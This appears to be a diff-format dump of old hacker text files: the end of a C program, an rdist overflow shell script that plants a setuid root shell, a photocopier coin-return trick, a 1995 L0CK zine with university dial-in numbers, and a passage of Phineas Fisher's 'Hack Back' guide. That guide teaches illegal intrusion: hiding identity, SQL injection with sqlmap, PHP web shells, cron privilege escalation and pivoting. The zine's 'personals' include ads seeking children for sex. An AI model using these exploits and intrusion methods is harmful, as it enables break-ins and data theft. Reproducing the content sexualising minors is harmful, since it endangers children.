while (*ptr != NULL) {
|
||||
puts(*ptr);
|
||||
ptr++;
|
||||
}
|
||||
}
|
||||
exit(0);
|
||||
}
|
||||
---------------> KUT HERE AZ WELL <-------------------
|
||||
|
||||
|
||||
Ok below u will find my cuztomized rdist overfl0w exploit
|
||||
it shuld b obvious az 2 how it werkz.. umm itz a shell skript
|
||||
or something. - blewt
|
||||
-------------> KUT HERE <-----------------------------
|
||||
|
||||
#!/bin/sh
|
||||
SUID=/tmp/.rewtin
|
||||
cat <<_EOF_ > test
|
||||
TaaaaL0CKL0CKL0CKL0CKL0CKaaL0CKl0CKL0CKL0CKL0CKL0CKL0CKL0CKL0CKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
|
||||
a
|
||||
QL0CKL0CKL0CKL0CKL0CKL0CKL0CK
|
||||
QL0CKL0CKL0CKLC0KL0CKL0Ck
|
||||
QaaaL0CKL0CKL0CKaaaaaaaaa
|
||||
QaaaaaaaaL0CKL0CKaaaaaaa
|
||||
Scp /bin/sh $SUID
|
||||
Schmod 4755 $SUID
|
||||
_EOF_
|
||||
cat test | /usr/ucb/rdist -Server localhost
|
||||
rm -rf test
|
||||
if [ -f $SUID ]; then
|
||||
echo "$SUID <---- instar00t [K0URTESY 0F L0CK]"
|
||||
fi
|
||||
------------------> KUT HERE 2<----------------------
|
||||
|
||||
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
||||
Disclaimer: By continuing to read past this point you are hereby agreeing that
|
||||
this information is for interest value only, and that you will never actually
|
||||
physically act out or reproduce anything mentioned below. Further more, you are
|
||||
agreeing that the author/authors of this article and the people responsible for
|
||||
distrubuting it can in NOÿway be held responsible for its contents or any side-
|
||||
effects/incidents directly or indirectly caused by this information. - RAgent
|
||||
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
||||
RAgent And VaxBuster POZZE Productions
|
||||
presents
|
||||
"HOW TO RIP OFF COIN-OPERATED PHOTOCOPY MACHINES"
|
||||
|
||||
We've all had to do, projects/assignments, and needed to make some
|
||||
photocopies out of Book, so you can plagiarize it, when ya get home (I
|
||||
personally just pull out the page(s) i need.), And if u need to copy 10 or so
|
||||
pages, your up for some dosh.
|
||||
|
||||
So when i was at school, sitting in the library, contemplating, should i either (1) Use
|
||||
my last 2 bucks to buy a Pie and Big M for lunch or (2), get those photocopies
|
||||
i need for my Project on the life cycle of the frog (Sounds like Fun hey ...).
|
||||
Their was no question to what i was gonna Do. Hmmmmmmm Meat PIE.
|
||||
|
||||
So to Fill up my time, a buddy and i, went over to the photocopying
|
||||
machine, and when ppl were just about to press the copy button, we'd press
|
||||
the return coin button. Its was rather amusing, watching them trying figure
|
||||
out why the photocopier was not working. Anyway, my friend decided he was going
|
||||
to forfeit his lunch and do some copying.
|
||||
|
||||
Every time he tried to copy, i'd press the coin return Button.
|
||||
After about 20 attempts at trying to photocopy, he got me kicked out (the
|
||||
Bastard).
|
||||
|
||||
But while messing around, i discovered this:
|
||||
|
||||
If you press the copy button and the return coin button, at the same time, it
|
||||
would return your coin and make the copy.
|
||||
|
||||
It won't work everytime, but if ya practice, u can get it to work most of the
|
||||
time which sure as hell beats paying for the shit.
|
||||
|
||||
BTW if you're interested in anarchy and what it means to be a TRUE anarchist
|
||||
then here is a list of the all time greats who have written books on the
|
||||
subject, go to your state library and check them out (yeah I know library's
|
||||
aren't the kewlest of places to hang out :( -
|
||||
|
||||
WILLIAM GODWIN
|
||||
PETER KROPOTKIN
|
||||
PIERRE JOSEPH PROUDHON
|
||||
G.P. MAXIMOFF
|
||||
VERNON RICHARDS
|
||||
TOLSTOY
|
||||
HERBERT EDWARD READ
|
||||
GEORGE WOODCOCK
|
||||
JAMES JOLL
|
||||
DANIEL GUERIN
|
||||
APRIL CARTER
|
||||
DAVID E. APTER
|
||||
LEONARD I. KRIMERMAN
|
||||
LEWIS PERRY
|
||||
IRVING L. HOROWITZ
|
||||
P. ELTZBACHER
|
||||
PAUL AVRICH
|
||||
FRANCO VENTURI
|
||||
DAVID FOOTMAN
|
||||
|
||||
|
||||
|
||||
Closing Remarks
|
||||
~~~~~~~~~~~~~~~
|
||||
w0rds cannot begin 2 describe the way mutual masturbation with
|
||||
my [L0CK] brothers makes me feel...
|
||||
|
||||
- sarlo
|
||||
[L0CK]
|
261
L0CK/l0ck4.txt
Normal file
261
L0CK/l0ck4.txt
Normal file
|
@ -0,0 +1,261 @@
|
|||
|
||||
|
||||
|
||||
|
||||
\ _ _ / ARG! ARG! ARG! ARG! ARG! ARG! \ _ _ /
|
||||
\((___))/ \((___))/
|
||||
[ o x ] L0CK communications [ o x ]
|
||||
|(_)| ...presents... |(_)|
|
||||
( o ) ( o )
|
||||
/ (_) \ the GNU October 1995 release. / (_) \
|
||||
/ Let's Pretend I'm the adult and you're the little \
|
||||
boy.. So Grab Ur 3-D Glasses! L0CK is BACK!
|
||||
|
||||
|
||||
|
||||
......................................................................
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
Table_Of_Contents
|
||||
~~~~~~~~~~~~~~~~~
|
||||
|
||||
hacking college computers..................sarlo
|
||||
letters to L0CK............................blewt
|
||||
L0CK personals.............................max-q
|
||||
the warrior's prayer.......................blewt
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
......................................................................
|
||||
|
||||
|
||||
|
||||
|
||||
***THE FOLLOWING IS FOR INFORMATIONAL PURPOSES ONLY***
|
||||
***I ACCEPT NO RESPONSABILITY FOR ANYTHING YOU DO***
|
||||
***WHICH GETS YOU ARRESTED OR SOMETHING***
|
||||
|
||||
&%&%&%&%&%&%&%& Fun with Temple's Computers &%&%&%&%&%&%&%&%
|
||||
|
||||
Shut up what's the number!?
|
||||
|
||||
Gee your impatient...
|
||||
2400 - (215)204-9630
|
||||
9600 - (215)204-9638
|
||||
14400 - (215)204-2800
|
||||
|
||||
So what the hell do I get?
|
||||
|
||||
The following is a log of my activites...
|
||||
Pardon my stuoidyt I'm not familiar with the system...
|
||||
It is short but to me it looks like you could have a LOTTA fun !
|
||||
|
||||
CONNECT 14400/ARQ
|
||||
C
|
||||
|
||||
|
||||
Welcome to TempleNet - Temple University's Ethernet network
|
||||
|
||||
Enter a Command followed by [Return] or [Enter].
|
||||
|
||||
Command: Description:
|
||||
telnet astro Astro Unix system
|
||||
tn3270 ibm IBM mainframe
|
||||
telnet library Temple's library catalog
|
||||
|
||||
For HELP, call the Network HOTLINE at 204-6529.
|
||||
|
||||
**Dialin for up to 2400 bps: 204-9630 thru 9634 (40 ports to WiseOwl)
|
||||
**Dialin for up to 9600 bps: 204-9638 (7 ports to WiseOwl)
|
||||
**Dialin for up to 14400 bps: 204-2800 (64 ports to TempleNet)
|
||||
|
||||
This system is restricted to authorized Temple University users and is
|
||||
subject to audit. The unauthorized access, use, or modification of any
|
||||
network component is a criminal violation of federal and state laws. (4)
|
||||
|
||||
|
||||
|
||||
|
||||
TempleNet>telnet ibm
|
||||
Trying IBM (155.247.14.2)... Open
|
||||
.
|
||||
|
||||
.exit
|
||||
|
||||
HCPCFC015E Command not valid before LOGON: EXIT
|
||||
|
||||
Enter one of the following commands:
|
||||
|
||||
LOGON userid (Example: LOGON VMUSER1)
|
||||
LOGOFF
|
||||
.logon vmuser1
|
||||
|
||||
HCPLGA053E VMUSER1 not in CP directory
|
||||
|
||||
Enter one of the following commands:
|
||||
|
||||
LOGON userid (Example: LOGON VMUSER1)
|
||||
LOGOFF
|
||||
.logoff
|
||||
|
||||
LOGOFF AT 22:27:26 EDT FRIDAY 06/09/95
|
||||
|
||||
[Connection to IBM closed by foreign host]
|
||||
TempleNet>
|
||||
|
||||
TempleNet>?
|
||||
|
||||
connect <host> Connect to host - same as typing just a host name
|
||||
disconnect <cn> Break the connection specified by name or number
|
||||
exit, quit, logout Exit from the EXEC
|
||||
lat <service> Connect to service using DEC LAT protocol
|
||||
lock Lock the terminal
|
||||
name-connection Give a connection a logical name
|
||||
resume Make the named connection be current
|
||||
rlogin <host> Connect to host using rlogin protocol
|
||||
show <cmd> Information commands, type "show ?" for list
|
||||
slip <addr> Enter SLIP mode
|
||||
systat Show terminal lines and users
|
||||
telnet <host> Connect to host using telnet protocol
|
||||
tn3270 <host> Connect to host using telnet protocol (3270)
|
||||
terminal Change terminal's parameters, type "terminal ?"
|
||||
where Show open connections
|
||||
xremote Enter XRemote mode
|
||||
<cr> To resume connection
|
||||
|
||||
TempleNet>
|
||||
|
||||
TempleNet>telnet astro
|
||||
Trying ASTRO (155.247.165.100)... Open
|
||||
|
||||
|
||||
EP/IX (astro)
|
||||
|
||||
login: user1
|
||||
Password:
|
||||
UX:login: ERROR: Login incorrect
|
||||
|
||||
NO CARRIER
|
||||
|
||||
Now remember ... :-)
|
||||
This system is restricted to authorized Temple University users and is
|
||||
subject to audit. The unauthorized access, use, or modification of any
|
||||
network component is a criminal violation of federal and state laws. (4)
|
||||
|
||||
Have fun with it!(Oh by the way I dialed the number by "accident" Hehehe)
|
||||
|
||||
-Sarlo 10/13/95 [L0CK]
|
||||
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
LETTERS TO [L0CK]
|
||||
Dear [L0CK],
|
||||
I have been dating my boyfreind for almost 2 years and i thought i really
|
||||
loved him. But a few months ago i met another guy who is absolutely
|
||||
adoreable and lots of fun to be with. I feel guilty and miserable when
|
||||
I'm with this other man. What sould I do, [L0CK]?
|
||||
- Torn Between Two Lovers
|
||||
|
||||
Dear Torn,
|
||||
Ah the classic love triangle. The situation is really not fair to anyone,
|
||||
but the longer you stay in it the stickier it will get.[teehee] Get your
|
||||
long-term relationship out in the open. Whatever you decide to do, do it
|
||||
fast and gently!
|
||||
- blewt [L0CK]
|
||||
******************************************************************************
|
||||
ATTENTION: WE DECIDED TO ADD A NEW SECTION TO THE [L0CK] GNUZLETTER: THIS IS
|
||||
IN LARGE PART DUE TO LOTS OF MEN WRITTING ME AND ASKING ME TO PRINT THEIR
|
||||
PERSONALS. I HAD MY DOUBTS ABOUT IT, BUT SINCE MANY MEN HAVE NOT FOUND TRUE
|
||||
LOVE LIKE I HAVE WITH MY BROTHERS, I FELT PITY FOR THEM. JUST LIKE BATMAN
|
||||
AND ROBIN, WALLY AND THE BEAVER, SKIPPER AND GILLIGAN, MINOR THREAT AND
|
||||
MUCHO MAAS THEY CAN FIND TRUE BROTHERLY HAPPINESS. - MAX-Q
|
||||
*****************************************************************************
|
||||
|
|
||||
COCK-A-DOODLE-DOO | JOIN IN OUR PAGAN MEETINGS
|
||||
|
|
||||
Pre-Op Transexual Marine looking | A Bi-Weekly Discussion of Life
|
||||
for boys who like red bottoms and | and Homosexuality. Call and be
|
||||
propper punishment. | involved. 703-360-8427
|
||||
|
|
||||
--------------------------------------+---------------------------------------
|
||||
|
|
||||
ARE YOU AFRAID OF THE DARK | ORAL ATHLETIC AND FLEXIBLE
|
||||
|
|
||||
Confused About Relationships and | Seeking Discreet Dominant Male
|
||||
tired of being hassled by nosey | for sensual stimulation and some
|
||||
Investigators from the Child Welfare | Phantastic times. You Know what
|
||||
Agencey? We Can Help. Discreet. | You want! Come and Get it!
|
||||
|
|
||||
--------------------------------------+---------------------------------------
|
||||
|
|
||||
YOU KNOW THE CONSEQUENCES | YOUR SPECIAL AD
|
||||
|
|
||||
Help Me Seize Young Offenders and | COULD BE RIGHT HERE #@!
|
||||
their Equipment. I'll Show You an |
|
||||
Interjudicial Proceeding that will | SEND ELECTRONIC MAIL TO:
|
||||
Change Your Lifestyle! | MAX-Q@2600.COM
|
||||
|
|
||||
--------------------------------------+---------------------------------------
|
||||
|
|
||||
ARE YOU 11 OR 12 ??? | Str41Gh+ Act1nG M4l3 (El1t3)
|
||||
|
|
||||
Looking for men 11 - 12 for adult | L00k1ng F0r MasCul1n3 Sh0rt GuY
|
||||
video satisfaction. I am 35 into | f0R s4fe T1m3s. I w4n+ t0 B3
|
||||
Professional wrestling. | Tr34t3d Juzt L1k3 a L1tTle g1rL.
|
||||
Let's talk soon : 505-984-8800 | d0 m3 n0w!! : 516-T0o-kRAd
|
||||
|
|
||||
--------------------------------------+---------------------------------------
|
||||
|
|
||||
LET'S BE FREE | MUCH OLDER GENTLEMAN
|
||||
|
|
||||
Gay White Male 38, 5'11" looking | Looking For Asian Boy 12 - 18
|
||||
for men, 12 - 32 clean, fit, and | who is petite. Someone to go
|
||||
hairy. Discreet Encounters. | out with. Very Discreet.
|
||||
Call Anytime : 516-751-2600 | Call Tonight! 011-61-2-368-0041
|
||||
|
|
||||
--------------------------------------+---------------------------------------
|
||||
|
||||
"The Warrior's Prayer," by blewt [L0CK]
|
||||
|
||||
To my ancestors, whom I shall leave anonymous, and my man, max-q:
|
||||
|
||||
I leave this day for battle.
|
||||
I know not whom I fight.
|
||||
The victory is not certain.
|
||||
For our enemies are strong.
|
||||
|
||||
I carry myself with courage.
|
||||
Though I quake with fear.
|
||||
I fight them all with honor.
|
||||
For I have my brothers near.
|
||||
|
||||
Oh ye I pray to thee,
|
||||
Those who came before,
|
||||
For the strength of heart I need...
|
||||
Just to lift this keyboard.
|
||||
|
||||
I know I seem the coward,
|
||||
Standing on the snow.
|
||||
I no longer wear my armor.
|
||||
I have lost my will to love.
|
||||
|
||||
What can I do with this life,
|
||||
O ye in the beyond?
|
||||
How can I look the others in the face,
|
||||
Now that my will to love is gone?
|
||||
|
||||
So to thee I say my final goodbye,
|
||||
And a hardy forget-me-not.
|
||||
For I'll always have my brothers,
|
||||
And together we are [L0CK].
|
||||
|
||||
- blewt - 1995
|
||||
|
||||
|
407
PhineasFisher/1.txt
Executable file
407
PhineasFisher/1.txt
Executable file
|
@ -0,0 +1,407 @@
|
|||
_ _ _ ____ _ _
|
||||
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
|
||||
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
|
||||
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|
||||
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
|
||||
|
||||
A DIY Guide for those without the patience to wait for whistleblowers
|
||||
|
||||
|
||||
--[ 1 ]-- Introduction
|
||||
|
||||
I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz
|
||||
it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple
|
||||
it is, and to hopefully inform and inspire you to go out and hack shit. If you
|
||||
have no experience with programming or hacking, some of the text below might
|
||||
look like a foreign language. Check the resources section at the end to help you
|
||||
get started. And trust me, once you've learned the basics you'll realize this
|
||||
really is easier than filing a FOIA request.
|
||||
|
||||
|
||||
--[ 2 ]-- Staying Safe
|
||||
|
||||
This is illegal, so you'll need to take same basic precautions:
|
||||
|
||||
1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
|
||||
2) Inside the encrypted volume install Whonix [1]
|
||||
3) (Optional) While just having everything go over Tor thanks to Whonix is
|
||||
probably sufficient, it's better to not use an internet connection connected
|
||||
to your name or address. A cantenna, aircrack, and reaver can come in handy
|
||||
here.
|
||||
|
||||
[0] https://truecrypt.ch/downloads/
|
||||
[1] https://www.whonix.org/wiki/Download#Install_Whonix
|
||||
|
||||
As long as you follow common sense like never do anything hacking related
|
||||
outside of Whonix, never do any of your normal computer usage inside Whonix,
|
||||
never mention any information about your real life when talking with other
|
||||
hackers, and never brag about your illegal hacking exploits to friends in real
|
||||
life, then you can pretty much do whatever you want with no fear of being v&.
|
||||
|
||||
NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable
|
||||
for some things like web browsing, when it comes to using hacking tools like
|
||||
nmap, sqlmap, and nikto that are making thousands of requests, they will run
|
||||
very slowly over Tor. Not to mention that you'll want a public IP address to
|
||||
receive connect back shells. I recommend using servers you've hacked or a VPS
|
||||
paid with bitcoin to hack from. That way only the low bandwidth text interface
|
||||
between you and the server is over Tor. All the commands you're running will
|
||||
have a nice fast connection to your target.
|
||||
|
||||
|
||||
--[ 3 ]-- Mapping out the target
|
||||
|
||||
Basically I just repeatedly use fierce [0], whois lookups on IP addresses and
|
||||
domain names, and reverse whois lookups to find all IP address space and domain
|
||||
names associated with an organization.
|
||||
|
||||
[0] http://ha.ckers.org/fierce/
|
||||
|
||||
For an example let's take Blackwater. We start out knowing their homepage is at
|
||||
academi.com. Running fierce.pl -dns academi.com we find the subdomains:
|
||||
67.238.84.228 email.academi.com
|
||||
67.238.84.242 extranet.academi.com
|
||||
67.238.84.240 mail.academi.com
|
||||
67.238.84.230 secure.academi.com
|
||||
67.238.84.227 vault.academi.com
|
||||
54.243.51.249 www.academi.com
|
||||
|
||||
Now we do whois lookups and find the homepage of www.academi.com is hosted on
|
||||
Amazon Web Service, while the other IPs are in the range:
|
||||
NetRange: 67.238.84.224 - 67.238.84.255
|
||||
CIDR: 67.238.84.224/27
|
||||
CustName: Blackwater USA
|
||||
Address: 850 Puddin Ridge Rd
|
||||
|
||||
Doing a whois lookup on academi.com reveals it's also registered to the same
|
||||
address, so we'll use that as a string to search with for the reverse whois
|
||||
lookups. As far as I know all the actual reverse whois lookup services cost
|
||||
money, so I just cheat with google:
|
||||
"850 Puddin Ridge Rd" inurl:ip-address-lookup
|
||||
"850 Puddin Ridge Rd" inurl:domaintools
|
||||
|
||||
Now run fierce.pl -range on the IP ranges you find to lookup dns names, and
|
||||
fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more
|
||||
whois lookups and repeat the process until you've found everything.
|
||||
|
||||
Also just google the organization and browse around its websites. For example on
|
||||
academi.com we find links to a careers portal, an online store, and an employee
|
||||
resources page, so now we have some more:
|
||||
54.236.143.203 careers.academi.com
|
||||
67.132.195.12 academiproshop.com
|
||||
67.238.84.236 te.academi.com
|
||||
67.238.84.238 property.academi.com
|
||||
67.238.84.241 teams.academi.com
|
||||
|
||||
If you repeat the whois lookups and such you'll find academiproshop.com seems to
|
||||
not be hosted or maintained by Blackwater, so scratch that off the list of
|
||||
interesting IPs/domains.
|
||||
|
||||
In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com
|
||||
was simply a whois lookup of finfisher.com which found it registered to the name
|
||||
"FinFisher GmbH". Googling for:
|
||||
"FinFisher GmbH" inurl:domaintools
|
||||
finds gamma-international.de, which redirects to finsupport.finfisher.com
|
||||
|
||||
...so now you've got some idea how I map out a target.
|
||||
This is actually one of the most important parts, as the larger the attack
|
||||
surface that you are able to map out, the easier it will be to find a hole
|
||||
somewhere in it.
|
||||
|
||||
|
||||
--[ 4 ]-- Scanning & Exploiting
|
||||
|
||||
Scan all the IP ranges you found with nmap to find all services running. Aside
|
||||
from a standard port scan, scanning for SNMP is underrated.
|
||||
|
||||
Now for each service you find running:
|
||||
|
||||
1) Is it exposing something it shouldn't? Sometimes companies will have services
|
||||
running that require no authentication and just assume it's safe because the url
|
||||
or IP to access it isn't public. Maybe fierce found a git subdomain and you can
|
||||
go to git.companyname.come/gitweb/ and browse their source code.
|
||||
|
||||
2) Is it horribly misconfigured? Maybe they have an ftp server that allows
|
||||
anonymous read or write access to an important directory. Maybe they have a
|
||||
database server with a blank admin password (lol stratfor). Maybe their embedded
|
||||
devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's
|
||||
default password.
|
||||
|
||||
3) Is it running an old version of software vulnerable to a public exploit?
|
||||
|
||||
|
||||
Webservers deserve their own category. For any webservers, including ones nmap
|
||||
will often find running on nonstandard ports, I usually:
|
||||
|
||||
1) Browse them. Especially on subdomains that fierce finds which aren't intended
|
||||
for public viewing like test.company.com or dev.company.com you'll often find
|
||||
interesting stuff just by looking at them.
|
||||
|
||||
2) Run nikto [0]. This will check for things like webserver/.svn/,
|
||||
webserver/backup/, webserver/phpinfo.php, and a few thousand other common
|
||||
mistakes and misconfigurations.
|
||||
|
||||
3) Identify what software is being used on the website. WhatWeb is useful [1]
|
||||
|
||||
4) Depending on what software the website is running, use more specific tools
|
||||
like wpscan [2], CMS-Explorer [3], and Joomscan [4].
|
||||
|
||||
First try that against all services to see if any have a misconfiguration,
|
||||
publicly known vulnerability, or other easy way in. If not, it's time to move
|
||||
on to finding a new vulnerability:
|
||||
|
||||
5) Custom coded web apps are more fertile ground for bugs than large widely used
|
||||
projects, so try those first. I use ZAP [5], and some combination of its
|
||||
automated tests along with manually poking around with the help of its
|
||||
intercepting proxy.
|
||||
|
||||
6) For the non-custom software they're running, get a copy to look at. If it's
|
||||
free software you can just download it. If it's proprietary you can usually
|
||||
pirate it. If it's proprietary and obscure enough that you can't pirate it you
|
||||
can buy it (lame) or find other sites running the same software using google,
|
||||
find one that's easier to hack, and get a copy from them.
|
||||
|
||||
[0] http://www.cirt.net/nikto2
|
||||
[1] http://www.morningstarsecurity.com/research/whatweb
|
||||
[2] http://wpscan.org/
|
||||
[3] https://code.google.com/p/cms-explorer/
|
||||
[4] http://sourceforge.net/projects/joomscan/
|
||||
[5] https://code.google.com/p/zaproxy/
|
||||
|
||||
|
||||
For finsupport.finfisher.com the process was:
|
||||
|
||||
* Start nikto running in the background.
|
||||
|
||||
* Visit the website. See nothing but a login page. Quickly check for sqli in the
|
||||
login form.
|
||||
|
||||
* See if WhatWeb knows anything about what software the site is running.
|
||||
|
||||
* WhatWeb doesn't recognize it, so the next question I want answered is if this
|
||||
is a custom website by Gamma, or if there are other websites using the same
|
||||
software.
|
||||
|
||||
* I view the page source to find a URL I can search on (index.php isn't
|
||||
exactly unique to this software). I pick Scripts/scripts.js.php, and google:
|
||||
allinurl:"Scripts/scripts.js.php"
|
||||
|
||||
* I find there's a handful of other sites using the same software, all coded by
|
||||
the same small webdesign firm. It looks like each site is custom coded but
|
||||
they share a lot of code. So I hack a couple of them to get a collection of
|
||||
code written by the webdesign firm.
|
||||
|
||||
At this point I can see the news stories that journalists will write to drum
|
||||
up views: "In a sophisticated, multi-step attack, hackers first compromised a
|
||||
web design firm in order to acquire confidential data that would aid them in
|
||||
attacking Gamma Group..."
|
||||
|
||||
But it's really quite easy, done almost on autopilot once you get the hang of
|
||||
it. It took all of a couple minutes to:
|
||||
|
||||
* google allinurl:"Scripts/scripts.js.php" and find the other sites
|
||||
|
||||
* Notice they're all sql injectable in the first url parameter I try.
|
||||
|
||||
* Realize they're running Apache ModSecurity so I need to use sqlmap [0] with
|
||||
the option --tamper='tamper/modsecurityversioned.py'
|
||||
|
||||
* Acquire the admin login information, login and upload a php shell [1] (the
|
||||
check for allowable file extensions was done client side in javascript), and
|
||||
download the website's source code.
|
||||
|
||||
[0] http://sqlmap.org/
|
||||
[1] https://epinna.github.io/Weevely/
|
||||
|
||||
Looking through the source code they might as well have named it Damn Vulnerable
|
||||
Web App v2 [0]. It's got sqli, LFI, file upload checks done client side in
|
||||
javascript, and if you're unauthenticated the admin page just sends you back to
|
||||
the login page with a Location header, but you can have your intercepting proxy
|
||||
filter the Location header out and access it just fine.
|
||||
|
||||
[0] http://www.dvwa.co.uk/
|
||||
|
||||
Heading back over to the finsupport site, the admin /BackOffice/ page returns
|
||||
403 Forbidden, and I'm having some issues with the LFI, so I switch to using the
|
||||
sqli (it's nice to have a dozen options to choose from). The other sites by the
|
||||
web designer all had an injectable print.php, so some quick requests to:
|
||||
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
|
||||
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
|
||||
reveal that finsupport also has print.php and it is injectable. And it's
|
||||
database admin! For MySQL this means you can read and write files. It turns out
|
||||
the site has magicquotes enabled, so I can't use INTO OUTFILE to write files.
|
||||
But I can use a short script that uses sqlmap --file-read to get the php source
|
||||
for a URL, and a normal web request to get the HTML, and then finds files
|
||||
included or required in the php source, and finds php files linked in the HTML,
|
||||
to recursively download the source to the whole site.
|
||||
|
||||
Looking through the source, I see customers can attach a file to their support
|
||||
tickets, and there's no check on the file extension. So I pick a username and
|
||||
password out of the customer database, create a support request with a php shell
|
||||
attached, and I'm in!
|
||||
|
||||
|
||||
--[ 5 ]-- (fail at) Escalating
|
||||
|
||||
___________
|
||||
< got r00t? >
|
||||
-----------
|
||||
\ ^__^
|
||||
\ (oo)\_______
|
||||
(__)\ )\/\
|
||||
||----w |
|
||||
|| ||
|
||||
^^^^^^^^^^^^^^^^
|
||||
|
||||
Root over 50% of linux servers you encounter in the wild with two easy scripts,
|
||||
Linux_Exploit_Suggester [0], and unix-privesc-check [1].
|
||||
|
||||
[0] https://github.com/PenturaLabs/Linux_Exploit_Suggester
|
||||
[1] https://code.google.com/p/unix-privesc-check/
|
||||
|
||||
finsupport was running the latest version of Debian with no local root exploits,
|
||||
but unix-privesc-check returned:
|
||||
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user
|
||||
www-data can write to /etc/cron.hourly/mgmtlicensestatus
|
||||
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
|
||||
can write to /etc/cron.hourly/webalizer
|
||||
|
||||
so I add to /etc/cron.hourly/webalizer:
|
||||
chown root:root /path/to/my_setuid_shell
|
||||
chmod 04755 /path/to/my_setuid_shell
|
||||
|
||||
wait an hour, and ....nothing. Turns out that while the cron process is running
|
||||
it doesn't seem to be actually running cron jobs. Looking in the webalizer
|
||||
directory shows it didn't update stats the previous month. Apparently after
|
||||
updating the timezone cron will sometimes run at the wrong time or sometimes not
|
||||
run at all and you need to restart cron after changing the timezone. ls -l
|
||||
/etc/localtime shows the timezone got updated June 6, the same time webalizer
|
||||
stopped recording stats, so that's probably the issue. At any rate, the only
|
||||
thing this server does is host the website, so I already have access to
|
||||
everything interesting on it. Root wouldn't get much of anything new, so I move
|
||||
on to the rest of the network.
|
||||
|
||||
|
||||
--[ 6 ]-- Pivoting
|
||||
|
||||
The next step is to look around the local network of the box you hacked. This
|
||||
is pretty much the same as the first Scanning & Exploiting step, except that
|
||||
from behind the firewall many more interesting services will be exposed. A
|
||||
tarball containing a statically linked copy of nmap and all its scripts that you
|
||||
can upload and run on any box is very useful for this. The various nfs-* and
|
||||
especially smb-* scripts nmap has will be extremely useful.
|
||||
|
||||
The only interesting thing I could get on finsupport's local network was another
|
||||
webserver serving up a folder called 'qateam' containing their mobile malware.
|
||||
|
||||
|
||||
--[ 7 ]-- Have Fun
|
||||
|
||||
Once you're in their networks, the real fun starts. Just use your imagination.
|
||||
While I titled this a guide for wannabe whistleblowers, there's no reason to
|
||||
limit yourself to leaking documents. My original plan was to:
|
||||
1) Hack Gamma and obtain a copy of the FinSpy server software
|
||||
2) Find vulnerabilities in FinSpy server.
|
||||
3) Scan the internet for, and hack, all FinSpy C&C servers.
|
||||
4) Identify the groups running them.
|
||||
5) Use the C&C server to upload and run a program on all targets telling them
|
||||
who was spying on them.
|
||||
6) Use the C&C server to uninstall FinFisher on all targets.
|
||||
7) Join the former C&C servers into a botnet to DDoS Gamma Group.
|
||||
|
||||
It was only after failing to fully hack Gamma and ending up with some
|
||||
interesting documents but no copy of the FinSpy server software that I had to
|
||||
make due with the far less lulzy backup plan of leaking their stuff while
|
||||
mocking them on twitter.
|
||||
Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password
|
||||
already so I can move on to step 2!
|
||||
|
||||
|
||||
--[ 8 ]-- Other Methods
|
||||
|
||||
The general method I outlined above of scan, find vulnerabilities, and exploit
|
||||
is just one way to hack, probably better suited to those with a background in
|
||||
programming. There's no one right way, and any method that works is as good as
|
||||
any other. The other main ways that I'll state without going into detail are:
|
||||
|
||||
1) Exploits in web browers, java, flash, or microsoft office, combined with
|
||||
emailing employees with a convincing message to get them to open the link or
|
||||
attachment, or hacking a web site frequented by the employees and adding the
|
||||
browser/java/flash exploit to that.
|
||||
This is the method used by most of the government hacking groups, but you don't
|
||||
need to be a government with millions to spend on 0day research or subscriptions
|
||||
to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit
|
||||
for a couple thousand, and rent access to one for much less. There's also
|
||||
metasploit browser autopwn, but you'll probably have better luck with no
|
||||
exploits and a fake flash updater prompt.
|
||||
|
||||
